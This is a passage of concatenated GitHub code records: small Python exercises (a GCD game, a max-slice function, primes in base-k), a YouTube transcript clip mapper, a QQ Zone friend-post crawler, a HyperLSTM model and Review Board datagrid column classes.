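\n# Worked example (illustrative, not part of the original file):\n#   calculation(48, 18) -> calculation(48 % 18, 18) = calculation(12, 18)\n#                       -> calculation(12, 18 % 12) = calculation(12, 6)\n#                       -> calculation(12 % 6, 6)   = calculation(0, 6) -> 6\n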
\n\ndef statement_generation():\n    \"\"\"Statement of the task condition.\n\n    Returns:\n        question_arg: Two random numbers as a string.\n        correct_answer: The greatest common divisor of the numbers, as a string.\n    \"\"\"\n    number_one = randint(START_RANGE, END_RANGE)  # noqa:S311\n    number_two = randint(START_RANGE, END_RANGE)  # noqa:S311\n    correct_answer = str(calculation(number_one, number_two))\n    question_arg = '{0} {1}'.format(number_one, number_two)\n    return question_arg, correct_answer\n\n\ndef main():\n    \"\"\"Game flow.\"\"\"\n    rules = 'Find the greatest common divisor of given numbers.'\n    name = sc.welcome(rules)\n    sc.game_flow(name, statement_generation)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"korolkevich/python-project-lvl1","sub_path":"brain_games/scripts/brain_gcd.py","file_name":"brain_gcd.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"6620881656","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 10 13:21:31 2020\n\n@author: B Bartschi\n\"\"\"\n\nfrom youtube_transcript_api import YouTubeTranscriptApi\nimport random \n\ndef find_clip_info_from_phrase(phrase, word_mapping, use_random_version=True, specified_versions=[]):\n    \"\"\"\n    Takes in a phrase and finds times within videos when words are said.\n    \n    Parameters:\n        phrase (string): the input phrase to search for\n        word_mapping (dict): keys are individual words that map to a list of transcript phrases.\n            For example {'trajectory' : [{'video': 'lebron1.mp4', 'text': 'trajectory of his shot', 'start': 285.84, 'duration': 5.12}]}\n        use_random_version (boolean): specifies if a random clip should be chosen when there are multiple clips for the same word\n        specified_versions (list): index of each clip when there are multiple of the same word \n        \n    Returns:\n        clip_info (list) : a list of tuples where each element is (video_file, (start_time, duration))\n        specifieds (list): index of each clip chosen when there are multiple of the same word \n    \"\"\"\n    clip_info = []\n    \n    if use_random_version: \n        specifieds = []\n    else:\n        specifieds = specified_versions\n    \n    count = 0\n    for word in phrase.split():\n        assert word in word_mapping, word + \" is not contained in the given videos\"\n        if (use_random_version):\n            version_index = random.randint(0,len(word_mapping[word])-1)\n            specifieds.append(version_index)\n        else:\n            version_index = specified_versions[count]\n        \n        entry = word_mapping[word][version_index]\n        clip_info.append( (entry['video'],(entry['start'],entry['duration'])) )\n        count += 1\n    \n    return clip_info, specifieds\n\ndef get_word_mapping_from_transcripts(youtube_ids):\n    \"\"\"\n    Creates a dictionary mapping individual words to transcript phrases\n    \n    Parameters:\n        youtube_ids (dict): maps video filenames to youtube IDs\n    \n    Returns:\n        word_mapping (dict): keys are individual words that map to a list of transcript phrases.\n            For example {'trajectory' : [{'video': 'lebron1.mp4', 'text': 'trajectory of his shot', 'start': 285.84, 'duration': 5.12}]}\n    \"\"\"\n    word_mapping = {}\n    \n    for filename, ID in youtube_ids.items():\n        current_transcript = YouTubeTranscriptApi.get_transcript(ID)\n        for phrase in current_transcript:\n            for word in set(phrase['text'].split()):\n                if word in word_mapping.keys():\n                    new_phrase = {'video':filename, 'text':phrase['text'], 'start':phrase['start'], 'duration':phrase['duration']}\n                    word_mapping[word].append(new_phrase)\n                else:\n                    word_mapping[word] = [{'video':filename, 'text':phrase['text'], 'start':phrase['start'], 'duration':phrase['duration']}]\n    \n    return word_mapping\n
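\n# Sketch of intended use (the video ID below is a hypothetical placeholder,\n# added for illustration):\n#   ids = {'lebron1.mp4': 'some_youtube_id'}\n#   mapping = get_word_mapping_from_transcripts(ids)\n#   clips, chosen = find_clip_info_from_phrase('trajectory of', mapping)\n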
\n","repo_name":"bbartschi14/narrative_concatenator","sub_path":"video_transcripts.py","file_name":"video_transcripts.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"4579365335","text":"from src.spider.QQZoneFriendSpider import QQZoneFriendSpider\nimport json\nfrom urllib import parse\nfrom src.util.constant import BASE_DIR\nfrom copy import deepcopy\n\nclass QQZoneFriendMoodSpider(QQZoneFriendSpider):\n    \"\"\"\n    Crawl the moods (status updates) of specified friends\n    \"\"\"\n    def __init__(self, use_redis=False, debug=False, analysis=True, recover=False,\n                 username='', mood_begin=0, mood_num=-1, stop_time='-1', from_web=False, nickname='', no_delete=True, cookie_text='',\n                 export_excel=False, export_csv = True, pool_flag='127.0.0.1',\n                 download_small_image=False, download_big_image=False,\n                 download_mood_detail=True, download_like_detail=True, download_like_names=True):\n        QQZoneFriendSpider.__init__(self, use_redis=use_redis, debug=debug, username=username, export_csv=export_csv,\n                                    mood_begin=mood_begin, mood_num=mood_num, stop_time=stop_time, from_web=from_web,\n                                    download_small_image=download_small_image, download_big_image=download_big_image,\n                                    download_mood_detail=download_mood_detail, download_like_detail=download_like_detail,\n                                    download_like_names=download_like_names, nickname=nickname, no_delete=no_delete, cookie_text=cookie_text,\n                                    recover=recover, export_excel=export_excel, pool_flag=pool_flag, analysis=analysis)\n        if not self.from_web:\n            self.friend_name_list = self.get_friend_username()\n        else:\n            self.friend_name_list = []\n        self.base_dir = ''\n\n    def get_friend_username(self):\n        config_path = BASE_DIR + 'config/friend_info.json'\n        try:\n            with open(config_path, 'r', encoding='utf-8') as r:\n                friend_info = json.load(r)\n            return friend_info\n        except BaseException as e:\n            self.format_error(e, \"friend_info.json does not exist!\")\n            exit(1)\n\n    def change_username(self, friend_qq, nick_name):\n        self.username = friend_qq\n        self.nickname = nick_name\n        self.mood_host = self.http_host + '/' + self.username + '/mood/'\n        self.init_file_name()\n        self.init_parameter()\n\n    # Build the URL of the users who liked a post; a friend's like URL differs from one's own\n    def get_aggree_url(self, unikey):\n        url = 'https://user.qzone.qq.com/proxy/domain/users.qzone.qq.com/cgi-bin/likes/get_like_list_app?'\n        params = {\n            \"uin\": self.raw_username,\n            \"unikey\": unikey,\n            \"begin_uin\": 0,\n            \"query_count\": 60,\n            \"if_first_page\": 1,\n            \"g_tk\": self.g_tk,\n        }\n        url = url + parse.urlencode(params)\n        return url\n\n    def get_friend_mood(self, friend_qq='', nick_name='佚名', mood_num = -1):\n        \"\"\"\n\n        :param friend_qq:\n        :param nick_name:\n        :param mood_num: the mood_num passed here takes precedence\n        :return:\n        \"\"\"\n        if self.g_tk == 0:\n            # self.login()\n            self.login_with_qr_code()\n        if friend_qq != '':\n            print(\"friend_qq was passed in, so the contents of the config file friend_info.json are discarded\")\n            self.friend_name_list.clear()\n            self.friend_name_list.append(dict(friend_qq=friend_qq, nick_name=nick_name))\n        for friend in self.friend_name_list:\n            if mood_num != -1:\n                self.mood_num = mood_num\n            print(\"begin to capture:\", friend['friend_qq'])\n            self.change_username(friend['friend_qq'], friend['nick_name'])\n            # Re-initialize parameters\n            self.init_parameter()\n\n            self.init_file_name()\n\n            self.get_mood_list()\n            self.mood_num = -1\n\n    def reset_username(self):\n        \"\"\"\n        Reset the username, nickname and file names\n        :return:\n        \"\"\"\n        self.username = deepcopy(self.raw_username)\n        self.nickname = deepcopy(self.raw_nickname)\n        self.mood_host = self.http_host + '/' + self.username + '/mood/'\n        self.init_file_name()\n        self.init_parameter()\n\nif __name__ == '__main__':\n    qqfriend = QQZoneFriendMoodSpider(use_redis=False, debug=False, mood_begin=0, mood_num=500,\n                                      stop_time='2014-06-01',\n                                      download_small_image=False, download_big_image=False,\n                                      download_mood_detail=True, download_like_detail=True, download_like_names=True,\n                                      recover=False)\n    qqfriend.get_friend_mood()\n","repo_name":"Maicius/QQZoneMood","sub_path":"src/spider/QQZoneFriendMoodSpider.py","file_name":"QQZoneFriendMoodSpider.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"34"}
{"seq_id":"4324611446","text":"# A[P] + A[P+1] + ... + A[Q]\n#(3, 4) is a slice of A that has sum 4,\n#(2, 2) is a slice of A that has sum −6,\n#(0, 1) is a slice of A that has sum 5,\n#no other slice of A has sum greater than (0, 1).\n\ndef solution(A):\n    best = 0\n    for P in range(0, len(A)):\n        for Q in range(P + 1, len(A) + 1):\n            print(\"A[P:Q] {} sum {}\".format(A[P:Q], sum(A[P:Q])))\n            if best < sum(A[P:Q]):\n                best = sum(A[P:Q])\n    return best\n
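\n# Illustrative linear-time alternative (added for clarity, not in the original\n# file): Kadane's algorithm. Unlike the loop above it assumes a non-empty\n# slice, so for all-negative input it returns the largest element rather than 0.\ndef solution_kadane(A):\n    best = cur = A[0]\n    for x in A[1:]:\n        cur = max(x, cur + x)\n        best = max(best, cur)\n    return best\n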
\n# [0 1 2 3 4]\nA=[3,2,-6,4,0]\nprint(solution(A))","repo_name":"miko73/codity","sub_path":"MaxSlice.py","file_name":"MaxSlice.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"7751459063","text":"from torch import nn\nfrom torch.nn import init\nimport sys \n\nsys.path.append('C:/driver_workload/attention-hyperlstm-classification')\nsys.path.append('C:/driver_workload/attention-hyperlstm-classification/models') \n\nfrom models.hyperlstm import HyperLSTMCell, LSTMCell\n\nclass RecModel(nn.Module):\n\n    def __init__(self, rnn_type, input_size, hidden_size, \n                 hyper_hidden_size, hyper_embedding_size,\n                 use_layer_norm, dropout_prob, output_size):\n        super().__init__()\n\n        self.rnn_type = rnn_type\n        self.input_size = input_size\n        self.hidden_size = hidden_size\n        self.hyper_hidden_size = hyper_hidden_size\n        self.hyper_embedding_size = hyper_embedding_size\n        self.use_layer_norm = use_layer_norm\n        self.dropout_prob = dropout_prob\n        self.output_size = output_size\n        \n        if rnn_type == 'hyperlstm':\n            self.rnn_cell = HyperLSTMCell(\n                input_size=input_size, \n                hidden_size=hidden_size,\n                hyper_hidden_size=hyper_hidden_size,\n                hyper_embedding_size=hyper_embedding_size,\n                use_layer_norm=use_layer_norm, \n                dropout_prob=dropout_prob)\n        elif rnn_type == 'lstm':\n            self.rnn_cell = LSTMCell(\n                input_size=input_size, \n                hidden_size=hidden_size,\n                use_layer_norm=use_layer_norm,\n                dropout_prob=dropout_prob)\n        else:\n            raise ValueError('Unknown RNN type')\n        self.output_proj = nn.Linear(in_features=hidden_size,\n                                     out_features=output_size)\n        self.dropout = nn.Dropout(dropout_prob)\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        self.rnn_cell.reset_parameters()\n        init.xavier_uniform_(self.output_proj.weight.data)\n        init.constant_(self.output_proj.bias.data, val=0)\n\n    def forward(self, inputs, state, hyper_state=None):\n        inputs_emb = inputs\n        max_length = inputs.size(1)\n\n        rnn_outputs = []\n        for t in range(max_length):\n            if self.rnn_type == 'hyperlstm':\n                output, state, hyper_state = self.rnn_cell(\n                    x=inputs_emb[:,t], state=state, hyper_state=hyper_state)\n            elif self.rnn_type == 'lstm':\n                output, state = self.rnn_cell.forward(\n                    x=inputs_emb[:,t], state=state)\n            else:\n                raise ValueError('Unknown RNN type')\n            rnn_outputs.append(output)\n            # rnn_outputs.append(self.output_proj(output))\n        \n        rnn_outputs = rnn_outputs[-1]\n\n        logits = self.output_proj(rnn_outputs)\n        # logits = rnn_outputs\n        \n        return rnn_outputs, logits, state, hyper_state\n","repo_name":"yhh-IV/Driver-Workload-Recognition","sub_path":"attention-hyperlstm-classification/workload_classification/model_workload_att.py","file_name":"model_workload_att.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"31669002223","text":"def check_prime(n):\n    if n == 1:\n        return False\n    else:\n        for i in range(2, int((n**0.5))+1):\n            if n % i == 0:\n                return False\n        return True\n\ndef binary_transform(num, base):\n    lib = '0123456789ABCDEF'\n    q, r = divmod(num, base)\n    return binary_transform(q, base) + lib[r] if q else lib[r]\n\n\n# Zeros on either side of a prime chunk can be ignored; if a zero sits in the\n# middle (e.g. 101), the chunk is not a single prime\ndef solution(n, k):\n    if k != 10:\n        trans = str(binary_transform(n,k))\n    else:\n        trans = str(n)\n    nums = list(trans.split('0'))\n    while '' in nums: # split('0') alone leaves '' entries when zeros are consecutive\n        nums.remove('')\n    answer = 0\n\n    for num in nums:\n        if check_prime(int(num)):\n            answer += 1\n    return answer\n#n = 110011\n#k = 10\n#print(solution(n,k))","repo_name":"myone2e/programmers","sub_path":"kakao/2022_blind/q2_prime_in_kbit_binary.py","file_name":"q2_prime_in_kbit_binary.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"4591448815","text":"from functools import reduce\n\nfrom django.template.defaultfilters import date\nfrom django.urls import NoReverseMatch\nfrom django.utils.html import (conditional_escape, escape, format_html,\n                               format_html_join)\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import gettext_lazy as _, gettext, ngettext\nfrom djblets.datagrid.grids import CheckboxColumn, Column, DateTimeColumn\nfrom djblets.siteconfig.models import SiteConfiguration\n\nfrom reviewboard.accounts.models import ReviewRequestVisit\nfrom reviewboard.avatars import avatar_services\nfrom reviewboard.reviews.models import ReviewRequest\nfrom reviewboard.reviews.templatetags.reviewtags import render_star\nfrom reviewboard.site.urlresolvers import local_site_reverse\n\n\nclass BaseStarColumn(Column):\n    \"\"\"Indicates if an item is starred.\n\n    This is the base class for all columns that deal with starring items.\n\n    The star is interactive, allowing the user to star or unstar the item.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(BaseStarColumn, self).__init__(\n            image_class='rb-icon rb-icon-star-on',\n            image_alt=_('Starred'),\n            detailed_label=_('Starred'),\n            shrink=True,\n            *args, **kwargs)\n\n    def setup_state(self, state):\n        \"\"\"Set up the state for this column.\"\"\"\n        state.all_starred = set()\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        obj.starred = 
obj.pk in state.all_starred\n        return render_star(state.datagrid.request.user, obj)\n\n\nclass UsernameColumn(Column):\n    \"\"\"A column for showing a username and the user's avatar.\n\n    The username and avatar will link to the user's profile page and will\n    show basic profile information when hovering over the link.\n\n    When constructing an instance of this column, the relation between the\n    object being represented in the datagrid and the user can be specified\n    as a tuple or list of field names forming a path to the user field.\n    \"\"\"\n\n    AVATAR_SIZE = 24\n\n    def __init__(self, label=_('Username'), user_relation=[], *args, **kwargs):\n        \"\"\"Initialize the column.\n\n        Args:\n            label (unicode, optional):\n                The label for the column.\n\n            user_relation (list of unicode, optional):\n                A list of fields forming a relation path to the user. This can\n                be left blank if representing the user.\n\n            *args (tuple):\n                Additional positional arguments to pass to the column.\n\n            **kwargs (dict):\n                Additional keyword arguments to pass to the column.\n        \"\"\"\n        self._user_relation = user_relation\n\n        super(UsernameColumn, self).__init__(\n            label=label,\n            db_field='__'.join(user_relation + ['username']),\n            css_class='submitter-column',\n            shrink=True,\n            sortable=True,\n            link=True,\n            link_func=self._link_user,\n            link_css_class='user',\n            *args, **kwargs)\n\n    def get_user(self, obj):\n        \"\"\"Return the user associated with this object.\n\n        Args:\n            obj (object):\n                The object provided to the column.\n\n        Returns:\n            django.contrib.auth.models.User:\n                The resulting user.\n        \"\"\"\n        # Look up the user in the provided obj by traversing the relation.\n        # If _user_relation is empty, then obj is the user.\n        user = obj\n\n        for field_name in self._user_relation:\n            user = getattr(user, field_name)\n\n        return user\n\n    def render_data(self, state, obj):\n        \"\"\"Render the user's name and avatar as HTML.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn):\n                The column state.\n\n            obj (django.db.models.Model):\n                The object being rendered in the datagrid.\n\n        Returns:\n            django.utils.safestring.SafeText:\n                The HTML for the column.\n        \"\"\"\n        user = self.get_user(obj)\n\n        # If avatars are enabled, we'll want to include that in the resulting\n        # HTML.\n        siteconfig = SiteConfiguration.objects.get_current()\n        request = state.datagrid.request\n        avatar_html = ''\n\n        if siteconfig.get(avatar_services.AVATARS_ENABLED_KEY):\n            avatar_service = avatar_services.for_user(user)\n\n            if avatar_service:\n                avatar_html = avatar_service.render(request=request,\n                                                    user=user,\n                                                    size=self.AVATAR_SIZE)\n\n        # Render the link to the user page, using the avatar and username.\n        username = user.username\n\n        return format_html('{0}{1}', avatar_html, username)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\n\n        This will select fields for the user and the user's profile, to\n        help with query performance.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn):\n                The column state.\n\n            queryset (django.db.models.query.QuerySet):\n                The queryset to augment.\n\n        Returns:\n            django.db.models.query.QuerySet:\n                The resulting queryset.\n        \"\"\"\n        user_field = '__'.join(self._user_relation)\n\n        if user_field:\n            fields = [user_field, '%s__profile' % user_field]\n        else:\n            fields = ['profile']\n\n        return queryset.select_related(*fields)\n\n    def _link_user(self, state, obj, *args):\n        \"\"\"Return the URL to link the user associated with this object.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn, unused):\n                The column state.\n\n            obj (object):\n                The object provided to the column.\n\n            *args (tuple):\n                Additional positional arguments provided to the method.\n\n        Returns:\n            unicode:\n                The URL for the user.\n        \"\"\"\n        return local_site_reverse(\n            'user',\n            request=state.datagrid.request,\n            kwargs={\n                'username': self.get_user(obj).username,\n            })\n
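\n# Example subclass use (hypothetical, added for illustration): a datagrid of\n# review requests whose model has a ``submitter`` foreign key to User could\n# construct this column with user_relation=['submitter'], so the username is\n# resolved through obj.submitter.\n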
\n\nclass FullNameColumn(Column):\n    \"\"\"Shows the full name of the user when appropriate.\"\"\"\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\n\n        This will select fields for the user and the user's profile, to\n        help with query performance.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn):\n                The column state.\n\n            queryset (django.db.models.query.QuerySet):\n                The queryset to augment.\n\n        Returns:\n            django.db.models.query.QuerySet:\n                The resulting queryset.\n        \"\"\"\n        return queryset.select_related('profile')\n\n    def render_data(self, state, user):\n        \"\"\"Render the full name, or blank if not visible to the user.\n\n        Args:\n            state (djblets.datagrid.grids.StatefulColumn):\n                The column state.\n\n            user (django.contrib.auth.models.User):\n                The user whose full name is to be rendered.\n\n        Returns:\n            unicode:\n                Either the full name (if visible to the user) or an empty string.\n        \"\"\"\n        profile = user.get_profile()\n\n        if user.is_profile_visible(state.datagrid.request.user):\n            display_name = \\\n                profile.get_display_name(state.datagrid.request.user)\n        else:\n            display_name = ''\n\n        return escape(display_name)\n\n\nclass BugsColumn(Column):\n    \"\"\"Shows the list of bugs specified on a review request.\n\n    The list of bugs will be linked to the bug tracker, if a bug tracker\n    was configured for the repository the review request's change is on.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        # Linking is disabled here so that the cell isn't generally clickable,\n
        # preventing visual and interaction issues with the bug links.\n        super(BugsColumn, self).__init__(\n            label=_('Bugs'),\n            css_class='bugs',\n            link=False,\n            shrink=True,\n            sortable=False,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.select_related('repository')\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        bugs = review_request.get_bug_list()\n        repository = review_request.repository\n        local_site_name = None\n\n        if review_request.local_site:\n            local_site_name = review_request.local_site.name\n\n        if repository and repository.bug_tracker:\n            links = []\n\n            for bug in bugs:\n                try:\n                    url = local_site_reverse(\n                        'bug_url',\n                        local_site_name=local_site_name,\n                        args=[review_request.display_id, bug])\n                    links.append(\n                        format_html('<a href=\"{0}\">{1}</a>',\n                                    url, bug))\n                except NoReverseMatch:\n                    links.append(escape(bug))\n\n            return ', '.join(links)\n\n        return format_html_join(\n            ', ',\n            '{0}',\n            ((bug,) for bug in bugs)\n        )\n\n\nclass ReviewRequestCheckboxColumn(CheckboxColumn):\n    \"\"\"A column containing a check-box.\"\"\"\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        if self.is_selectable(state, obj):\n            checked = ''\n\n            if self.is_selected(state, obj):\n                checked = 'checked=\"true\"'\n\n            return ('<input type=\"checkbox\" value=\"%s\" name=\"%s\" %s />'\n                    % (obj.display_id, escape(self.checkbox_name), checked))\n        else:\n            return ''\n\n\nclass DateTimeSinceColumn(DateTimeColumn):\n    \"\"\"Displays how long it has been since a given date/time.\n\n    These columns will dynamically update as the page is shown, so that the\n    number of minutes, hours, days, etc. 
ago is correct.\n    \"\"\"\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return '<time class=\"timesince\" datetime=\"%s\">%s</time>' % (\n            date(getattr(obj, self.field_name), 'c'),\n            super(DateTimeSinceColumn, self).render_data(state, obj))\n\n\nclass DiffUpdatedColumn(DateTimeColumn):\n    \"\"\"Shows the date/time that the diff was last updated.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(DiffUpdatedColumn, self).__init__(\n            label=_('Diff Updated'),\n            db_field='diffset_history__last_diff_updated',\n            field_name='last_diff_updated',\n            sortable=True,\n            link=False,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.select_related('diffset_history')\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        if obj.diffset_history.last_diff_updated:\n            return super(DiffUpdatedColumn, self).render_data(\n                state, obj.diffset_history)\n        else:\n            return ''\n\n\nclass DiffUpdatedSinceColumn(DateTimeSinceColumn):\n    \"\"\"Shows the elapsed time since the diff was last updated.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(DiffUpdatedSinceColumn, self).__init__(\n            label=_('Diff Updated'),\n            db_field='diffset_history__last_diff_updated',\n            field_name='last_diff_updated',\n            sortable=True,\n            link=False,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.select_related('diffset_history')\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        if obj.diffset_history.last_diff_updated:\n            return super(DiffUpdatedSinceColumn, self).render_data(\n                state, obj.diffset_history)\n        else:\n            return ''\n\n\nclass GroupMemberCountColumn(Column):\n    \"\"\"Shows the number of users that are part of a review group.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(GroupMemberCountColumn, self).__init__(\n            link=True,\n            link_func=self.link_to_object,\n            *args, **kwargs)\n\n    def render_data(self, state, group):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return str(group.users.count())\n\n    def link_to_object(self, state, group, value):\n        \"\"\"Return the link to the object in the column.\"\"\"\n        return local_site_reverse('group-members',\n                                  request=state.datagrid.request,\n                                  args=[group.name])\n\n\nclass GroupsColumn(Column):\n    \"\"\"Shows the list of groups requested to review the review request.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(GroupsColumn, self).__init__(\n            label=_('Groups'),\n            detailed_label=_('Target Groups'),\n            sortable=False,\n            shrink=False,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.prefetch_related('target_groups')\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        groups = review_request.target_groups.all()\n        return reduce(lambda a, d: a + d.name + ' ', groups, '')\n\n\nclass MyCommentsColumn(Column):\n    \"\"\"Shows if the current user has reviewed the review request.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(MyCommentsColumn, self).__init__(\n            image_class='rb-icon rb-icon-datagrid-comment-draft',\n            image_alt=_('My Comments'),\n            detailed_label=_('My
 Comments'),\n            shrink=True,\n            *args, **kwargs)\n\n        # XXX It'd be nice to be able to sort on this, but datagrids currently\n        #     can only sort based on stored (in the DB) values, not computed\n        #     values.\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        user = state.datagrid.request.user\n\n        if user.is_anonymous:\n            return queryset\n\n        query_dict = {\n            'user_id': str(user.id),\n        }\n\n        return queryset.extra(select={\n            'mycomments_my_reviews': \"\"\"\n                SELECT COUNT(1)\n                FROM reviews_review\n                WHERE reviews_review.user_id = %(user_id)s\n                AND reviews_review.review_request_id =\n                    reviews_reviewrequest.id\n            \"\"\" % query_dict,\n            'mycomments_private_reviews': \"\"\"\n                SELECT COUNT(1)\n                FROM reviews_review\n                WHERE reviews_review.user_id = %(user_id)s\n                AND reviews_review.review_request_id =\n                    reviews_reviewrequest.id\n                AND NOT reviews_review.public\n            \"\"\" % query_dict,\n            'mycomments_shipit_reviews': \"\"\"\n                SELECT COUNT(1)\n                FROM reviews_review\n                WHERE reviews_review.user_id = %(user_id)s\n                AND reviews_review.review_request_id =\n                    reviews_reviewrequest.id\n                AND reviews_review.ship_it\n            \"\"\" % query_dict,\n        })\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        user = state.datagrid.request.user\n\n        if user.is_anonymous or review_request.mycomments_my_reviews == 0:\n            return ''\n\n        # Priority is ranked in the following order:\n        #\n        # 1) Non-public (draft) reviews\n        # 2) Public reviews marked \"Ship It\"\n        # 3) Public reviews not marked \"Ship It\"\n        if review_request.mycomments_private_reviews > 0:\n            icon_class = 'rb-icon-datagrid-comment-draft'\n            image_alt = _('Comments drafted')\n        else:\n            if review_request.mycomments_shipit_reviews > 0:\n                icon_class = 'rb-icon-datagrid-comment-shipit'\n                image_alt = _('Comments published. Ship it!')\n            else:\n                icon_class = 'rb-icon-datagrid-comment'\n                image_alt = _('Comments published')\n\n        return ('<span class=\"rb-icon %s\" title=\"%s\"></span>'\n
                % (icon_class, image_alt))\n\n\nclass NewUpdatesColumn(Column):\n    \"\"\"Indicates if there are new updates on a review request.\n\n    This will show an icon if the review request has had any new updates\n    or reviews since the user last saw it.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(NewUpdatesColumn, self).__init__(\n            image_class='rb-icon rb-icon-new-updates',\n            image_alt=_('New Updates'),\n            detailed_label=_('New Updates'),\n            shrink=True,\n            *args, **kwargs)\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n\n        # Review requests for un-authenticated users will not contain the\n        # new_review_count attribute, so confirm its existence before\n        # attempting to access.\n        if (hasattr(review_request, 'new_review_count') and\n            review_request.new_review_count > 0):\n            return ('<span class=\"%s\" title=\"%s\"></span>'\n
                    % (self.image_class, self.image_alt))\n\n        return ''\n\n\nclass PendingCountColumn(Column):\n    \"\"\"Shows the pending number of review requests for a user or group.\n\n    This will show the pending number of review requests for the given\n    review group or user. It only applies to group or user lists.\n    \"\"\"\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return str(\n            getattr(obj, self.field_name).filter(\n                public=True, status='P').count())\n\n\nclass PeopleColumn(Column):\n    \"\"\"Shows the list of people requested to review the review request.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(PeopleColumn, self).__init__(\n            label=_('People'),\n            detailed_label=_('Target People'),\n            sortable=False,\n            shrink=False,\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.prefetch_related('target_people')\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        people = review_request.target_people.all()\n        return reduce(lambda a, d: a + d.username + ' ', people, '')\n\n\nclass RepositoryColumn(Column):\n    \"\"\"Shows the name of the repository the review request's change is on.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(RepositoryColumn, self).__init__(\n            label=_('Repository'),\n            db_field='repository__name',\n            shrink=True,\n            sortable=True,\n            link=False,\n            css_class='repository-column',\n            *args, **kwargs)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.select_related('repository')\n\n    def render_data(self, state, obj):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return super(RepositoryColumn, self).render_data(state, obj) or ''\n\n\nclass ReviewCountColumn(Column):\n    \"\"\"Shows the number of published reviews for a review request.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Initialize the column.\"\"\"\n        super(ReviewCountColumn, self).__init__(\n            label=_('Reviews'),\n            detailed_label=_('Number of Reviews'),\n            shrink=True,\n            link=True,\n            link_func=self.link_to_object,\n            *args, **kwargs)\n\n    def render_data(self, state, review_request):\n        \"\"\"Return the rendered contents of the column.\"\"\"\n        return str(review_request.publicreviewcount_count)\n\n    def augment_queryset(self, state, queryset):\n        \"\"\"Add additional queries to the queryset.\"\"\"\n        return queryset.extra(select={\n            'publicreviewcount_count': \"\"\"\n                SELECT COUNT(*)\n                FROM reviews_review\n                WHERE reviews_review.public\n                AND reviews_review.base_reply_to_id is NULL\n                AND reviews_review.review_request_id =\n                    reviews_reviewrequest.id\n            \"\"\"\n        })\n\n    def link_to_object(self, state, review_request, value):\n        \"\"\"Return the link to the object in the column.\"\"\"\n        return '%s#last-review' % review_request.get_absolute_url()\n\n\nclass ReviewGroupStarColumn(BaseStarColumn):\n    